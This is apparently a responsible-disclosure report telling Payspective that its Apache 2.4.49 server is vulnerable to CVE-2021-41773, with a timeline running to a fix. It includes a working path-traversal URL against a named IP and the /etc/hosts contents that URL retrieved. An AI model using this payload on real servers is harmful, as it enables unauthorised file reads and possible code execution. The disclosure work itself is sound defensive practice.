- Creation
- Validation
- Communication & fix
- Disclosure
Payspective / Apache 2.4.49 vulnerable to CVE-2021-41773
Deleted user
reported 2021-10-08
Your server was found vulnerable to CVE-2021-41773.
Attackers can read any file from your server.
Under some circumstances attackers are able to execute code on your server.
IP:
35.156.77.165Port:
443Detected protocol:
httpsVulnerable URL:
https://35.156.77.165/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hostsFound host file trough Apache traversal:
127.0.0.1 localhost
127.0.0.1 www.payspective.com payspective.com
# the following lines are desirable for ipv6 capable hosts
#::1 ip6-localhost ip6-loopback
#fe00::0 ip6-localnet
#ff00::0 ip6-mcastprefix
#ff02::1 ip6-allnodes
#ff02::2 ip6-allrouters
#ff02::3 ip6-allhosts
127.0.0.1 www.payspective.com payspective.com
Found by Apache2449TraversalPlugin 2021-10-08
Report created by
deleted-user
2021-10-08
deleted-user
2021-10-08
Report edited by
deleted-user
2021-10-08
deleted-user
2021-10-08
Report edited by
BloodyShell
2021-10-08
BloodyShell
2021-10-08
Report approved by
BloodyShell
2021-10-08
BloodyShell
2021-10-08
New PDF report generated by system 2021-10-08
Report edited by
BloodyShell
2021-10-08
BloodyShell
2021-10-08
New PDF report generated by system 2021-10-08
Report dispatched to ...@... by system 2021-10-08
BloodyShell
commented 2021-10-09:
approved
shows in report
Richard Rosser and Nick Patterson have been contacted through linkedin
New PDF report generated by system 2021-10-09
Report comment dispatched to linkks by system 2021-10-09
Report comment dispatched to info@payspective.com by system 2021-10-09
Report marked as fixed by
BloodyShell
2021-10-13
BloodyShell
2021-10-13
Report closed by
BloodyShell
2021-10-13
BloodyShell
2021-10-13
New PDF report generated by system 2021-10-13
Information
Owner
Payspective
Created
2021-10-08 11:25
Updated
2021-10-13 15:02
Fixed
true
Contacts
i...@payspective.com
Status
Status
closed
Hosting contacted
false
CERT contacted
false
Download report